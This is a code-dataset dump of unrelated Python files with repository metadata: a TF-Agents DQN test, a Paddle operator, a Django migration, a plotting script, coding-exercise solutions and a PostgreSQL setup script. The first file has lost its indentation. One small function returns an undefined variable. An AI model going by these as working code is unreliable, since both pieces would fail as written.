# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for agents.dqn.categorical_dqn_agent."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
from tf_agents.agents.categorical_dqn import categorical_dqn_agent
from tf_agents.networks import categorical_q_network
from tf_agents.networks import network
from tf_agents.networks import q_rnn_network
from tf_agents.specs import tensor_spec
from tf_agents.trajectories import policy_step
from tf_agents.trajectories import test_utils
from tf_agents.trajectories import time_step as ts
from tf_agents.trajectories import trajectory
from tf_agents.utils import common
class DummyCategoricalNet(network.Network):
def __init__(self,
input_tensor_spec,
num_atoms=51,
num_actions=2,
name=None):
self._num_atoms = num_atoms
self._num_actions = num_actions
super(DummyCategoricalNet, self).__init__(
input_tensor_spec=input_tensor_spec,
state_spec=(),
name=name)
# In CategoricalDQN we are dealing with a distribution over Q-values, which
# are represented as num_atoms bins, ranging from min_q_value to
# max_q_value. In order to replicate the setup in the non-categorical
# network (namely, [[2, 1], [1, 1]]), we use the following "logits":
# [[0, 1, ..., num_atoms-1, num_atoms, 1, ..., 1],
# [1, ......................................, 1]]
# The important bit is that the first half of the first list (which
# corresponds to the logits for the first action) place more weight on the
# higher q_values than on the lower ones, thereby resulting in a higher
# value for the first action.
weights_initializer = np.array([
np.concatenate((np.arange(num_atoms), np.ones(num_atoms))),
np.concatenate((np.ones(num_atoms), np.ones(num_atoms)))])
kernel_initializer = tf.compat.v1.initializers.constant(
weights_initializer, verify_shape=True)
bias_initializer = tf.compat.v1.initializers.ones()
# Store custom layers that can be serialized through the Checkpointable API.
self._dummy_layers = []
self._dummy_layers.append(
tf.keras.layers.Dense(
num_actions * num_atoms,
kernel_initializer=kernel_initializer,
bias_initializer=bias_initializer))
@property
def num_atoms(self):
return self._num_atoms
def call(self, inputs, unused_step_type=None, network_state=()):
inputs = tf.cast(inputs, tf.float32)
for layer in self._dummy_layers:
inputs = layer(inputs)
logits = tf.reshape(inputs, [-1, self._num_actions, self._num_atoms])
return logits, network_state
class DummyCategoricalQRnnNetwork(q_rnn_network.QRnnNetwork):
def __init__(self,
input_tensor_spec,
action_spec,
num_atoms=51,
**kwargs):
if not isinstance(action_spec, tensor_spec.BoundedTensorSpec):
raise TypeError('action_spec must be a BoundedTensorSpec. Got: %s' % (
action_spec,))
self._num_actions = action_spec.maximum - action_spec.minimum + 1
self._num_atoms = num_atoms
q_network_action_spec = tensor_spec.BoundedTensorSpec(
(), tf.int32, minimum=0, maximum=self._num_actions * num_atoms - 1)
super(DummyCategoricalQRnnNetwork, self).__init__(
input_tensor_spec=input_tensor_spec,
action_spec=q_network_action_spec,
**kwargs)
@property
def num_atoms(self):
return self._num_atoms
def call(self, observations, step_type=None, network_state=None):
logits, network_state = super(DummyCategoricalQRnnNetwork, self).call(
observations, step_type, network_state)
shape = logits.shape.as_list()
assert shape[-1] == self._num_actions * self._num_atoms
new_shape = shape[:-1] + [self._num_actions, self._num_atoms]
logits = tf.reshape(logits, new_shape)
return logits, network_state
class CategoricalDqnAgentTest(tf.test.TestCase):
def setUp(self):
super(CategoricalDqnAgentTest, self).setUp()
tf.enable_resource_variables()
self._obs_spec = tensor_spec.TensorSpec([2], tf.float32)
self._time_step_spec = ts.time_step_spec(self._obs_spec)
self._action_spec = tensor_spec.BoundedTensorSpec((), tf.int32, 0, 1)
self._categorical_net = categorical_q_network.CategoricalQNetwork(
self._obs_spec,
self._action_spec,
fc_layer_params=[4])
self._dummy_categorical_net = DummyCategoricalNet(self._obs_spec)
self._optimizer = tf.train.GradientDescentOptimizer(0.01)
def testCreateAgentNestSizeChecks(self):
action_spec = [
tensor_spec.BoundedTensorSpec([1], tf.int32, 0, 1),
tensor_spec.BoundedTensorSpec([1], tf.int32, 0, 1)
]
with self.assertRaisesRegexp(
ValueError, '.*Only one dimensional actions.*'):
categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
action_spec,
self._dummy_categorical_net,
self._optimizer)
def testCreateAgentDimChecks(self):
action_spec = [tensor_spec.BoundedTensorSpec([1, 2], tf.int32, 0, 1)]
with self.assertRaisesRegexp(
ValueError, '.*Only one dimensional actions.*'):
categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
action_spec,
self._dummy_categorical_net,
self._optimizer)
def testCreateAgentDefaultNetwork(self):
categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
self._action_spec,
self._categorical_net,
self._optimizer)
def testCriticLoss(self):
agent = categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
self._action_spec,
self._dummy_categorical_net,
self._optimizer)
observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
time_steps = ts.restart(observations, batch_size=2)
actions = tf.constant([0, 1], dtype=tf.int32)
action_steps = policy_step.PolicyStep(actions)
rewards = tf.constant([10, 20], dtype=tf.float32)
discounts = tf.constant([0.9, 0.9], dtype=tf.float32)
next_observations = tf.constant([[5, 6], [7, 8]], dtype=tf.float32)
next_time_steps = ts.transition(next_observations, rewards, discounts)
experience = test_utils.stacked_trajectory_from_transition(
time_steps, action_steps, next_time_steps)
# Due to the constant initialization of the DummyCategoricalNet, we can
# expect the same loss every time.
expected_loss = 2.195
loss_info = agent._loss(experience)
self.evaluate(tf.global_variables_initializer())
evaluated_loss = self.evaluate(loss_info).loss
self.assertAllClose(evaluated_loss, expected_loss, atol=1e-3)
def testCriticLossNStep(self):
agent = categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
self._action_spec,
self._dummy_categorical_net,
self._optimizer,
n_step_update=2)
observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
time_steps = ts.restart(observations, batch_size=2)
actions = tf.constant([0, 1], dtype=tf.int32)
action_steps = policy_step.PolicyStep(actions)
rewards = tf.constant([10, 20], dtype=tf.float32)
discounts = tf.constant([0.9, 0.9], dtype=tf.float32)
next_observations = tf.constant([[5, 6], [7, 8]], dtype=tf.float32)
next_time_steps = ts.transition(next_observations, rewards, discounts)
third_observations = tf.constant([[9, 10], [11, 12]], dtype=tf.float32)
third_time_steps = ts.transition(third_observations, rewards, discounts)
experience1 = trajectory.from_transition(
time_steps, action_steps, next_time_steps)
experience2 = trajectory.from_transition(
next_time_steps, action_steps, third_time_steps)
experience3 = trajectory.from_transition(
third_time_steps, action_steps, third_time_steps)
experience = tf.nest.map_structure(
lambda x, y, z: tf.stack([x, y, z], axis=1),
experience1, experience2, experience3)
loss_info = agent._loss(experience)
# discounted_rewards should evaluate to 10 + 0.9 * 10 = 19 and
# 20 + 0.9 * 20 = 38.
evaluated_discounted_rewards = self.evaluate(agent._discounted_rewards)
self.assertAllClose(evaluated_discounted_rewards, [[19], [38]], atol=1e-3)
# Both final_value_discount values should be 0.9 * 0.9 = 0.81.
evaluated_final_value_discount = self.evaluate(agent._final_value_discount)
self.assertAllClose(evaluated_final_value_discount, [[0.81], [0.81]],
atol=1e-3)
# Due to the constant initialization of the DummyCategoricalNet, we can
# expect the same loss every time.
expected_loss = 2.195
self.evaluate(tf.global_variables_initializer())
evaluated_loss = self.evaluate(loss_info).loss
self.assertAllClose(evaluated_loss, expected_loss, atol=1e-3)
def testPolicy(self):
agent = categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
self._action_spec,
self._categorical_net,
self._optimizer)
observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
time_steps = ts.restart(observations, batch_size=2)
actions, _, _ = agent.policy.action(time_steps)
self.assertEqual(actions.shape, [2])
self.evaluate(tf.global_variables_initializer())
actions_ = self.evaluate(actions)
self.assertTrue(all(actions_ <= self._action_spec.maximum))
self.assertTrue(all(actions_ >= self._action_spec.minimum))
def testInitialize(self):
agent = categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
self._action_spec,
self._categorical_net,
self._optimizer)
observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
time_steps = ts.restart(observations, batch_size=2)
actions = tf.constant([0, 1], dtype=tf.int32)
action_steps = policy_step.PolicyStep(actions)
rewards = tf.constant([10, 20], dtype=tf.float32)
discounts = tf.constant([0.9, 0.9], dtype=tf.float32)
next_time_steps = ts.transition(observations, rewards, discounts)
experience = test_utils.stacked_trajectory_from_transition(
time_steps, action_steps, next_time_steps)
loss_info = agent._loss(experience)
initialize = agent.initialize()
self.evaluate(tf.global_variables_initializer())
losses = self.evaluate(loss_info).loss
self.assertGreater(losses, 0.0)
critic_variables = agent._q_network.variables
target_critic_variables = agent._target_q_network.variables
self.assertTrue(critic_variables)
self.assertTrue(target_critic_variables)
self.evaluate(initialize)
for s, t in zip(critic_variables, target_critic_variables):
self.assertAllClose(self.evaluate(s), self.evaluate(t))
def testUpdateTarget(self):
agent = categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
self._action_spec,
self._categorical_net,
self._optimizer)
observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
time_steps = ts.restart(observations, batch_size=2)
actions = tf.constant([0, 1], dtype=tf.int32)
action_steps = policy_step.PolicyStep(actions)
experience = test_utils.stacked_trajectory_from_transition(
time_steps, action_steps, time_steps)
loss_info = agent._loss(experience)
update_targets = agent._update_target()
self.evaluate(tf.global_variables_initializer())
losses = self.evaluate(loss_info).loss
self.assertGreater(losses, 0.0)
self.evaluate(update_targets)
def testTrain(self):
agent = categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
self._action_spec,
self._dummy_categorical_net,
self._optimizer)
observations = tf.constant([[1, 2], [3, 4]], dtype=tf.float32)
time_steps = ts.restart(observations, batch_size=2)
actions = tf.constant([0, 1], dtype=tf.int32)
action_steps = policy_step.PolicyStep(actions)
rewards = tf.constant([10, 20], dtype=tf.float32)
discounts = tf.constant([0.9, 0.9], dtype=tf.float32)
next_observations = tf.constant([[5, 6], [7, 8]], dtype=tf.float32)
next_time_steps = ts.transition(next_observations, rewards, discounts)
experience = test_utils.stacked_trajectory_from_transition(
time_steps, action_steps, next_time_steps)
train_step = agent.train(experience, weights=None)
# Due to the constant initialization of the DummyCategoricalNet, we can
# expect the same loss every time.
expected_loss = 2.195
self.evaluate(tf.global_variables_initializer())
evaluated_loss, _ = self.evaluate(train_step)
self.assertAllClose(evaluated_loss, expected_loss, atol=1e-3)
def testTrainWithRnn(self):
action_spec = tensor_spec.BoundedTensorSpec([1], tf.int32, 0, 1)
batch_size = 5
observations = tf.constant(
[[[1, 2], [3, 4], [5, 6]]] * batch_size, dtype=tf.float32)
actions = tf.constant([[[0], [1], [1]]] * batch_size, dtype=tf.int32)
time_steps = ts.TimeStep(
step_type=tf.constant([[1] * 3] * batch_size, dtype=tf.int32),
reward=tf.constant([[1] * 3] * batch_size, dtype=tf.float32),
discount=tf.constant([[1] * 3] * batch_size, dtype=tf.float32),
observation=[observations])
experience = trajectory.Trajectory(
step_type=time_steps.step_type,
observation=observations,
action=actions,
policy_info=(),
next_step_type=time_steps.step_type,
reward=time_steps.reward,
discount=time_steps.discount)
categorical_q_rnn_network = DummyCategoricalQRnnNetwork(
self._obs_spec,
action_spec,
conv_layer_params=None,
input_fc_layer_params=(16,),
preprocessing_combiner=None,
lstm_size=(40,),
output_fc_layer_params=(16,),
)
counter = common.create_variable('test_train_counter')
agent = categorical_dqn_agent.CategoricalDqnAgent(
self._time_step_spec,
action_spec,
categorical_q_rnn_network,
optimizer=tf.train.AdamOptimizer(0.001),
)
# Force variable creation.
agent.policy.variables()
if tf.executing_eagerly():
loss = lambda: agent.train(experience)
else:
loss = agent.train(experience)
self.evaluate(tf.compat.v1.initialize_all_variables())
self.assertEqual(self.evaluate(counter), 0)
self.evaluate(loss)
if __name__ == '__main__':
tf.test.main()
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
081a6467862d8313dc76b52f240463d6543170aa | e1092274408656117bc00252bc761e3609ec437f | /python/paddle/distributed/auto_parallel/operators/dist_transpose.py | 8b40524e47315260d17e38f12bb95b5d93df39fb | [
"Apache-2.0"
] | permissive | xiegegege/Paddle | 92822623e4d7fe0263503f11b63fb22610bf2773 | df1d04ca0031da2d701f314f1c98afdbb107b1b5 | refs/heads/develop | 2022-01-13T08:34:09.835700 | 2021-12-30T07:06:03 | 2021-12-30T07:06:03 | 226,800,733 | 0 | 0 | Apache-2.0 | 2019-12-09T06:28:40 | 2019-12-09T06:28:39 | null | UTF-8 | Python | false | false | 4,337 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License
from .common import DistributedOperatorImplContainer
from .common import DistributedOperatorImpl
from .common import register_distributed_operator_impl_container
from .common import register_distributed_operator_impl
from ..utils import is_dim_shard
from ..utils import is_dim_replicate
from ..utils import is_valid_list_index
from ..utils import compute_compatible_dim_mapping
from ..utils import compute_compatible_dims_mapping
from ..utils import compute_compatible_and_update_dim_mapping
class DistributedTranspose2(DistributedOperatorImplContainer):
def __init__(self, name):
super(DistributedTranspose2, self).__init__()
self._name = name
register_distributed_operator_impl_container(
"transpose2", DistributedTranspose2("transpose2"))
class DistributedTranspose2Impl(DistributedOperatorImpl):
def __init__(self, name):
super(DistributedTranspose2Impl, self).__init__()
self._name = name
self._forward_implemented = False
self._backward_implemented = False
def is_input_compatible(self, dist_op):
return True
def is_output_compatible(self, dist_op):
return True
def is_auto_compatible(self, dist_op):
op_desc = dist_op.serial_op.desc
op_dist_attr = dist_op.dist_attr
perm = op_desc.attr('axis')
x_name = op_desc.input('X')[0]
out_name = op_desc.output('Out')[0]
x_shape_name = op_desc.output('XShape')[0]
x_shape_dims_mapping = op_dist_attr.get_output_dims_mapping(
x_shape_name)
x_dims_mapping = op_dist_attr.get_input_dims_mapping(x_name)
out_dims_mapping = op_dist_attr.get_output_dims_mapping(out_name)
new_dims_mapping = [-1 for i in range(len(x_dims_mapping))]
for i in range(len(x_dims_mapping)):
new_dims_mapping[i] = x_dims_mapping[perm[i]]
if len(x_dims_mapping) != len(out_dims_mapping):
return False
if new_dims_mapping != out_dims_mapping:
return False
if x_shape_dims_mapping[0] != -1:
return False
if x_shape_dims_mapping[1:] != x_dims_mapping[:]:
return False
return True
def update_dims_mapping(self, dist_op):
changed = False
op_desc = dist_op.serial_op.desc
op_dist_attr = dist_op.dist_attr
x_name = op_desc.input('X')[0]
out_name = op_desc.output('Out')[0]
x_shape_name = op_desc.output('XShape')[0]
x_dims_mapping = op_dist_attr.get_input_dims_mapping(x_name)
out_dims_mapping = op_dist_attr.get_output_dims_mapping(out_name)
x_shape_dims_mapping = op_dist_attr.get_output_dims_mapping(
x_shape_name)
perm = op_desc.attr('axis')
assert len(x_dims_mapping) == len(perm)
new_dims_mapping = [-1 for i in range(len(x_dims_mapping))]
for i in range(len(x_dims_mapping)):
new_dims_mapping[i] = x_dims_mapping[perm[i]]
for i in range(len(out_dims_mapping)):
dim_changed = compute_compatible_and_update_dim_mapping(
[new_dims_mapping, out_dims_mapping], [i, i])
if dim_changed:
changed = True
for i in range(len(x_dims_mapping)):
if x_dims_mapping[perm[i]] != new_dims_mapping[i]:
x_dims_mapping[perm[i]] = new_dims_mapping[i]
changed = True
for i in range(len(x_dims_mapping)):
x_shape_dims_mapping[i + 1] = x_dims_mapping[i]
return changed
@staticmethod
def backward(ctx, *args, **kwargs):
pass
register_distributed_operator_impl(
"transpose2", DistributedTranspose2Impl("same_mapping_transpose"))
| [
"noreply@github.com"
] | xiegegege.noreply@github.com |
a64a16ccd106e89067e9f9d78718ab8be8dfd26c | 3e6dffad73b8d5024024b52b044c57a05e7e9655 | /assets/2020-01-18/zoogle/zdocs/migrations/0001_initial.py | 63b30f2d3ceded209f620d30b12c629ee113f1c1 | [
"MIT"
] | permissive | dhilipsiva/talks | 07f33b162d8db6e20e3d5974576d71c273629187 | 05581b6b8fdd0598d4ffed4bf75204d718719ed9 | refs/heads/master | 2022-08-05T12:27:39.932612 | 2022-07-21T07:43:36 | 2022-07-21T07:43:36 | 68,734,565 | 5 | 3 | MIT | 2021-07-30T11:24:12 | 2016-09-20T17:05:44 | Python | UTF-8 | Python | false | false | 888 | py | # Generated by Django 3.0.2 on 2020-01-17 11:51
from django.db import migrations, models
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Zdoc',
fields=[
('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('subject', models.CharField(max_length=200)),
('description', models.CharField(max_length=400)),
('size', models.IntegerField()),
('owner', models.CharField(max_length=100)),
],
options={
'abstract': False,
},
),
]
| [
"dhilipsiva@pm.me"
] | dhilipsiva@pm.me |
b5da8a85646bf5e85130cdcf3f31dc9794265c46 | 83b5efa0d25c805971acf309146ca817f37692f2 | /src/visualization/markov_1_RMSE_comparison.py | 14c0f41a0dba1953a3e91bac58d3f03811fc6e2d | [
"MIT"
] | permissive | VictorOnink/Wind-Mixing-Diffusion | 3d104014de9e5d169c26320cca039aaaa1f490e2 | 16ac459f010ea3fd845335737a9a1e3f913b6103 | refs/heads/main | 2023-04-11T09:24:54.988598 | 2022-03-02T15:39:25 | 2022-03-02T15:39:25 | 314,201,646 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,748 | py | import matplotlib.pyplot as plt
import numpy as np
import analysis, settings
from visualization import utils_visualization as utils_v
def markov_1_RMSE_comparison(x_label=r'$u_{10}$ (m s$^{-1}$)', y_label=r'RMSE', fig_size=(16, 8),
ax_label_size=16, legend_size=11, wave_roughness=False):
"""
A figure showing the RMSE of M-0 and M-1 simulations relative to the field data for the various wind conditions
:param x_label: x axis label
:param y_label: y axis label
:param fig_size: figure size
:param ax_label_size: axis label fontsize
:param legend_size: legend fontsize
:param wave_roughness: if True, have surface roughness be wave height dependent
:return:
"""
# Setting the wind speeds, rise velocities and alpha values that we want to plot
w_10 = [0.85, 2.4, 4.35, 6.65, 9.3]
w_r = [-0.03, -0.003]
alpha = [0.0, 0.1, 0.3, 0.5, 0.7, 0.95]
# Setting a small offset so that markers for different rise velocities aren't plotted on top of each other
rise_offset = {-0.03: 0.15, -0.003: -0.15}
# Selecting the marker type according to the rise velocity
marker_type = {-0.03: 'o', -0.003: 'X'}
# Looping through the KPP simulations, and retrieving the RMSE values for them. First, for the M-0 simulations
point_list_KPP = []
for index_w10, wind in enumerate(w_10):
for rise in w_r:
RMSE = analysis.determine_RMSE(wind, rise, 'KPP', 'Ceiling', alpha=0.0, output=True,
wave_roughness=wave_roughness)
plot_tuple = RMSE, index_w10 + 1, marker_type[rise], utils_v.return_color(0)
point_list_KPP.append(plot_tuple)
# Then for the M-1 simulations
for index_w10, wind in enumerate(w_10):
for rise in w_r:
for index_a, a in enumerate(alpha):
RMSE = analysis.determine_RMSE(wind, rise, 'KPP', 'Ceiling_Markov', alpha=a, output=True,
wave_roughness=wave_roughness)
plot_tuple = RMSE, index_w10 + 1 + rise_offset[rise], marker_type[rise], utils_v.return_color(index_a + 1)
point_list_KPP.append(plot_tuple)
# Looping through the SWB simulations, and retrieving the RMSE values for them, first for the M-0 simulations
point_list_Kukulka = []
for index_w10, wind in enumerate(w_10):
for rise in w_r:
RMSE = analysis.determine_RMSE(wind, rise, 'SWB', 'Ceiling', alpha=0.0, output=True,
wave_roughness=wave_roughness)
plot_tuple = RMSE, index_w10 + 1, marker_type[rise], utils_v.return_color(0)
point_list_Kukulka.append(plot_tuple)
# And then for M-1 simulations
for index_w10, wind in enumerate(w_10):
for rise in w_r:
for index_a, a in enumerate(alpha):
RMSE = analysis.determine_RMSE(wind, rise, 'SWB', 'Ceiling_Markov', alpha=a, output=True,
wave_roughness=wave_roughness)
plot_tuple = RMSE, index_w10 + 1 + rise_offset[rise], marker_type[rise], utils_v.return_color(index_a + 1)
point_list_Kukulka.append(plot_tuple)
# Creating the axis
fig = plt.figure(figsize=fig_size)
# Adding the axis for KPP
ax = fig.add_subplot(121)
ax.set_xlabel(x_label, fontsize=ax_label_size)
ax.set_xlim((0, 6))
ax.tick_params(axis='both', labelsize=ax_label_size)
ax.set_ylabel(y_label, fontsize=ax_label_size)
ax.set_ylim((0, 0.15))
# Adding the axis for SWB
ax2 = fig.add_subplot(122)
ax2.set_xlim((0, 6))
ax2.set_xlabel(x_label, fontsize=ax_label_size)
ax2.tick_params(axis='both', labelsize=ax_label_size)
ax2.tick_params(labelleft=False)
# X axis = Concentration axis
ax2.set_ylim((0, 0.15))
ax.set_title(r'(a) KPP', fontsize=ax_label_size)
ax2.set_title(r'(b) SWB', fontsize=ax_label_size)
# Now, plotting the points
for point in point_list_KPP:
RMSE, index_w10, marker, color = point
ax.plot(index_w10, RMSE, color=color, marker=marker, alpha=0.7, markersize=10, mfc=None)
for point in point_list_Kukulka:
RMSE, index_w10, marker, color = point
ax2.plot(index_w10, RMSE, color=color, marker=marker, alpha=0.7, markersize=10, mfc=None)
# Now, altering the Y axis to list the wind speeds instead of the simple labels 1 - 5
ax.set_xticks(range(7))
ax.set_xticklabels(['', 0.85, 2.40, 4.35, 6.65, 9.30, ''])
ax2.set_xticks(range(7))
ax2.set_xticklabels(['', 0.85, 2.40, 4.35, 6.65, 9.30, ''])
# Next, adding a legend to explain the color scheme and the marker type
# Showing the marker type according to the rise velocity
marker = [plt.plot([], [], c='k', markersize=10, marker=marker_type[rise], label=label_marker(rise), linestyle='')[0] for rise in
w_r]
# Showing the color according to M-0/M-1 with alpha values
markov0 = [plt.plot([], [], c=utils_v.return_color(0), markersize=10, marker='o', label='M0', linestyle='')[0]]
markov1 = [plt.plot([], [], c=utils_v.return_color(ind + 1), markersize=10, marker='o',
label=r'M1 - $\alpha = $' + '{}'.format(a), linestyle='')[0] for ind, a in
enumerate(alpha)]
# Adding the legend
ax2.legend(handles=marker + markov0 + markov1, fontsize=legend_size, loc='lower left')
# Saving the figure
plt.savefig(settings.figure_dir + 'model_evaluation_markov_1.png', bbox_inches='tight', dpi=600)
def label_marker(rise):
""" Setting the figure label based on the rise velocity"""
return r'$w_{r}$' + ' = {}'.format(np.abs(rise)) + ' m s$^{-1}$'
| [
"31734765+VictorOnink@users.noreply.github.com"
] | 31734765+VictorOnink@users.noreply.github.com |
0afd4eee10e14e1b6303f505244a18b388f4e105 | 20132d827a96afa4f33da2424dbb52f58f01a844 | /Hash/Lessons42579/gamjapark_solution.py | bf234183778a0c3d46a8bfacfae6c1483158d56c | [
"MIT"
] | permissive | StudyForCoding/Programmers | 270cddd6e9dcfbad2916fbae7ae6f127844b64bd | bb520ba2cc188af932a222c76b9a508e3567f7f8 | refs/heads/master | 2022-07-16T03:00:25.227522 | 2020-05-21T11:32:18 | 2020-05-21T11:32:18 | 265,508,921 | 0 | 0 | MIT | 2020-05-21T11:32:19 | 2020-05-20T09:02:31 | Python | UTF-8 | Python | false | false | 965 | py | def solution(genres, plays):
answer = []
genre = dict()
for g in genres:
genre[g] = 0
PlayLength = len(plays)
play = [0 for _ in range(PlayLength)]
i = 0
for p, g in zip(plays,genres) :
play[i] = {g:p}
i += 1
for p in play:
genre[list(p.keys())[0]] += list(p.values())[0]
genre = sorted(genre.items(), key=lambda t: t[1], reverse=True)
for g in genre:
result_dict = dict()
i = 0
for p in play:
key = list(p.keys())[0]
if g[0] == key:
value = list(p.values())[0]
result_dict[i] = value
i += 1
result_dict = sorted(result_dict.items(), key=lambda kv: (-kv[1], kv[0]))
count = 0
for result in result_dict:
answer.append(result[0])
count += 1
if count == 2:
break
return answer | [
"gojang4@gmail.com"
] | gojang4@gmail.com |
dbd9fccd7ac5204f453bf57235a36d02f7ee7daa | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_342/ch7_2020_09_09_12_13_31_428073.py | 8f23596b9f6828be09ba337736b27df39a7b4582 | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 135 | py | def calcula_area_do_triangulo(b,h):
area_triangulo=((b*h)/2)
return area_do_triangulo
base=10
altura=5
print(base,altura)
| [
"you@example.com"
] | you@example.com |
0885fc81f9c934a44e70c6659f760daee032544c | 1a07ef7e046c6cc278cfbd2e3d2e15b03d9e11b5 | /collections-namedtuple.py | 56c2e6ab87774041da0f213182dfd47b551c928d | [] | no_license | tjguk/lightning-collections | 273b7da18ad6cf225186fb074685ad670d59bab1 | 6e78a2afbf880d611af7ebe52c8d764bf400b245 | refs/heads/master | 2020-06-02T10:26:17.518183 | 2012-09-06T12:42:35 | 2012-09-06T12:42:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 264 | py | import os, sys
from collections import namedtuple
import csv
with open("files.csv", "rb") as f:
reader = csv.reader(f)
fields = reader.next()
Row = namedtuple("Row", fields)
files = [Row(*row) for row in reader]
for f in files[:10]:
print f
| [
"mail@timgolden.me.uk"
] | mail@timgolden.me.uk |
ac76c3ad644fa22d248fc653a359b84f9b4c9d09 | 434b9b85bb901a4e50977e14a74aa4592b583ea2 | /old/config/share/databases/defaultdb/lenny/postgresql_server/script-config | f29b1fe4c02ca77a804fc4f94c0dbd57897f5473 | [] | no_license | umeboshi2/paella | 12dd9f4785588cd501d7916171a5179b7c29bb31 | df4cf032a100ea1c109bcf02b1c74bb217bc84c6 | refs/heads/master | 2021-01-25T12:07:20.785787 | 2015-06-02T16:03:30 | 2015-06-02T16:03:30 | 7,497,284 | 5 | 3 | null | 2015-01-23T22:25:19 | 2013-01-08T07:11:58 | Python | UTF-8 | Python | false | false | 4,911 | #!/usr/bin/python
import sys
from useless.base.path import path
from paella.installer.toolkit import InstallerTools
print "config script for postgresql_server"
it = InstallerTools()
env = it.env()
recreate_template1_instructions="""UPDATE pg_database SET datallowconn = TRUE where datname = 'template0';
\c template0
UPDATE pg_database SET datistemplate = FALSE where datname = 'template1';
drop database template1;
create database template1 with template = template0 encoding = '%s';
UPDATE pg_database SET datistemplate = TRUE where datname = 'template1';
\c template1
UPDATE pg_database SET datallowconn = FALSE where datname = 'template0';
"""
# TYPE DATABASE USER CIDR-ADDRESS METHOD
# "local" is for Unix domain socket connections only
# paella local connections
# IPv4 local connections:
# paella ipv4 connections
# IPv6 local connections:
# paella ipv6 connections
def is_marker(line):
if line.startswith('# paella local connections'):
return 'local'
elif line.startswith('# paella ipv4 connections'):
return 'ipv4'
elif line.startswith('# paella ipv6 connections'):
return 'ipv6'
else:
return ''
def get_connections(conntype):
key = 'postgresql_server:%s_connections' % conntype
number_of_connections = int(it.get(key))
connections = []
# we start counting at 1 instead of 0
for index in range(1, number_of_connections + 1):
key = 'postgresql_server:%s_connection_%d' % (conntype, index)
line = it.get(key)
connections.append(line)
return connections
def configure_pghba_conf(toolkit):
it = toolkit
pghba_filename = it.target / 'etc/postgresql/8.3/main/pg_hba.conf'
orig_lines = pghba_filename.lines()
new_lines = []
for line in orig_lines:
new_lines.append(line)
conntype = is_marker(line)
if conntype:
connections = get_connections(conntype)
new_lines += connections
pghba_filename.write_lines(new_lines)
# here the cmd must be a space separated
# shell type command, a list won't work
def su_postgres_cmd(toolkit, cmd):
su_cmd = ['su', 'postgres', '-c', cmd]
toolkit.chroot(su_cmd)
def recreate_template1(toolkit):
it = toolkit
encoding = it.get('postgresql_server:default_encoding')
print "creating new template1 with encoding:", encoding
cmd = ['su', 'postgres', '-c', 'psql template1']
proc = it.chroot_proc(cmd, stdin=it.PIPE)
instructions = recreate_template1_instructions % encoding
proc.stdin.write(instructions)
proc.stdin.flush()
proc.stdin.close()
retval = proc.wait()
if retval:
raise RuntimeError , "Problem with dropping template1"
def create_pg_users(toolkit):
it = toolkit
users = it.getcsv('postgresql_server:postgresql_users')
for user in users:
opt = it.get('postgresql_server:createuser_opts_%s' % user)
cmd = 'createuser %s %s' % (opt, user)
print "Creating postgresql user", user
su_postgres_cmd(it, cmd)
def create_language(toolkit, language, database):
cmd = 'createlang %s %s' % (language, database)
print "Creating language, %s in database %s" % (language, database)
su_postgres_cmd(toolkit, cmd)
# all initial databases are copies of
# the template1 database. If you want
# a language that is specific to a database,
# it will have to be done by other means.
def create_template1_languages(toolkit):
it = toolkit
languages = it.getcsv('postgresql_server:template1_languages')
for language in languages:
create_language(toolkit, language, 'template1')
def create_initial_databases(toolkit):
it = toolkit
databases = it.getcsv('postgresql_server:initial_databases')
for database in databases:
cmd = 'createdb %s' % database
print "Creating database", database
su_postgres_cmd(toolkit, cmd)
configure_pghba_conf(it)
recreate_template1(it)
create_pg_users(it)
create_template1_languages(it)
create_initial_databases(it)
#-- Connect as the postgres superuser, e.g.:
# -- psql -U postgres template1
# -- Then run:
# UPDATE pg_database SET datallowconn = TRUE where datname = 'template0';
# \c template0
# UPDATE pg_database SET datistemplate = FALSE where datname = 'template1';
# drop database template1;
# create database template1 with template = template0 encoding = 'UNICODE';
# UPDATE pg_database SET datistemplate = TRUE where datname = 'template1';
# \c template1
# UPDATE pg_database SET datallowconn = FALSE where datname = 'template0';
| [
